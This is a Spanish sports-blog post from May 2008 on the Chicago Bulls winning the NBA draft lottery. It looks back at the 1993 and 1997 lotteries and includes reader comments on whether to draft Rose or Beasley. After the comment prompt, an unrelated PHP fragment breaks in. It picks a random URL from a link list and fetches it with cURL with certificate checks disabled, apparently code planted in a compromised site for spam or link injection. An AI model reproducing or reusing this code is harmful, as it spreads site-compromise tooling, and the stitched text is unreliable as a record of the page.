La lotería cayó en Chicago

21 de May de 2008 por Dantley

Los Bulls de Chicago se han encontrado con un inesperado final feliz a una pésima temporada. Ayer, en la tradicional ceremonia celebrada en el Madison en Nueva York, la franquicia de Illinois obtuvo el derecho a elegir primeros en el draft 2008. Las posibilidades de que esto ocurriera eran de un escaso 1.7%, frente a un 25% de Miami.

La lotería suele ser considerado un momento menor incrustado entre grandes partidos de playoffs. Nada más lejos de la realidad. Las actuales bolas de ping-pong que se utilizan para el sorteo determinan el futuro de los equipos. En 1993, Orlando con un 1.5% de posibilidades ganó el derecho a elegir primero. Los Magic eligieron a Webber y lo traspasaron a los Warriors a cambio de, principalmente, el número 3 de ese mismo draft, Anfernee Hardaway. Hardaway, junto con Shaquille O’Neal drafteado en 1992, llevó a Orlando a las finales, algo impensable para una franquicia con pocos años de existencia.

Pero quizá ilustra mejor la importancia del sorteo la lotería de 1997. Boston tenía más opciones al número 1, mientras que San Antonio estaba en una segunda posición. El sorteo determinó que San Antonio elegiría primero. Los Spurs draftearon a un tal Timothy Duncan, los Celtics con el tercer pick eligieron a un Chauncey Billups que, ya fuera de Boston, tardó muchos años en ser un jugador determinante. El número 2 fue la última gran esperanza blanca, Keith Van Horn. Hoy en los playoffs de 2008, lo que sucedió en la lotería de 1997 todavía sigue influyendo.

En el resto de la lotería no hubo sorpresas, aunque es destacable la caída de Seattle del segundo puesto teórico a un cuarto lugar que les aleja de los dos jugadores probablemente más determinantes del draft, Derrick Rose y Michael Beasley. Miami, que tanto luchó con su equipo prestado de la D-League por el pick 1, se quedó finalmente con la segunda elección que no es un poco premio para tan discutible estrategia, ni mucho menos. Minnesota elegirá en tercer lugar, Memphis en quinto y New York en sexta posición.

Ahora los Bulls se encuentran en la situación de poder elegir a un hombre capaz de cambiar el futuro de la franquicia. Con un equipo sólido, al que quizá le ha faltado dirección de juego y liderazgo, Paxson se encuentra ante la tesitura de elegir entre Beasley, un anotador letal en posiciones interiores y Rose, un base con todas las cualidades para ser uno de los 5 mejores de la liga muy pronto que además es natural de Chicago. De alguna manera el destino ha compensado a los Bulls por la pérdida como jugador de baloncesto de Jay Williams, su elección en el número 2 del draft de Yao Ming.

En los próximos días, ofreceremos un análisis detallado del draft 2008, que se celebrará el próximo 26 de junio. Análisis de jugadores, necesidades de equipos, previsiones de elecciones, traspasos de rondas … la NBA sabe como encadenar acontecimientos para que la liga esté siempre viva. Aquí estaremos para contarlo.

Comenta

8 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Yo siendo Bulls elegiria a rose, y buscaria algun trade por hinrick.

      Citar

  2. Viva_Dirk dice:
    #2

    Todo depende de lo que tengan pensado hacer con el hueco salarial que tienen. Si ya tienen algo hablado con Brand, lo normal es que elijan a Rose, que puede significar mucho para la franquicia por el hecho de ser natural de Chicago. Pero sino, su elección deber ser Beasley, que llevan un año llorando la falta de un anotador interior.

      Citar

  3. Dantley dice:
    #3

    A un año vista algo hablado con Brand es papel mojado. De todas maneras creo que verán a ambos porque un tema importante es la actitud y hay más dudas sobre Beasley en ese sentido

      Citar

  4. Elio dice:
    #4

    Yo sólo espero que tengan suerte y elijan bien, la reconstrucción está durando mucho.

    Gran análisis y noticia de la lotería, me ha gustado mucho la explicación sobre como se conectan los puntos una década después.

      Citar

  5. Viva_Dirk dice:
    #5

    No no, Brand puede renunciar a un año y salir este mismo año al mercado, y Chicago puede darle el máximo, o muy cerca.

      Citar

  6. Dantley dice:
    #6

    Gracias Elio.

    Repasando reacciones y pronósticos parece que no está nada claro que hará Chicago. Andarán las opiniones alrededor de un 60/40 a favor de Rose. La duda es draftear a una estrella que va a anotar pero que no sabes si te hará el equipo mejor o apostar a que Rose será a Tyrus Thomas y Luol Deng lo que Paul ha sido para David West. El caso es que West tiene más clase (menos físico) que esos dos y no sabemos si Rose será Paul o se quedará en Mo Williams.

      Citar

  7. Dantley dice:
    #7

    Cierto, Brand tiene una player option, no me había dado cuenta. Aunque habrá que ver el tope salarial. De momento les impidiría renovar a Nocioni, además de que tienen que ver qué hacen con Hinrich y Gordon que acaban su contrato rookie

      Citar

  8. Viva_Dirk dice:
    #8

    Hinrich ya renovó por una pasta, de ahí se hablaba un trade con Brand y seguramente escoger a Rose, pero si pueden llevarselo a base de pasta sin soltar ningun jugador, no hay motivo para el traspaso.

    Gordon y Deng son los que faltan por renovar, hace unos meses pedían el máximo y Chicago se lo negó, dejar marchar a uno de los 2 a cambio de nada me parecería grave, con Gordon se espera algun S&T si sigue pidiendo mucho, a Deng creo que si le darán el máximo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>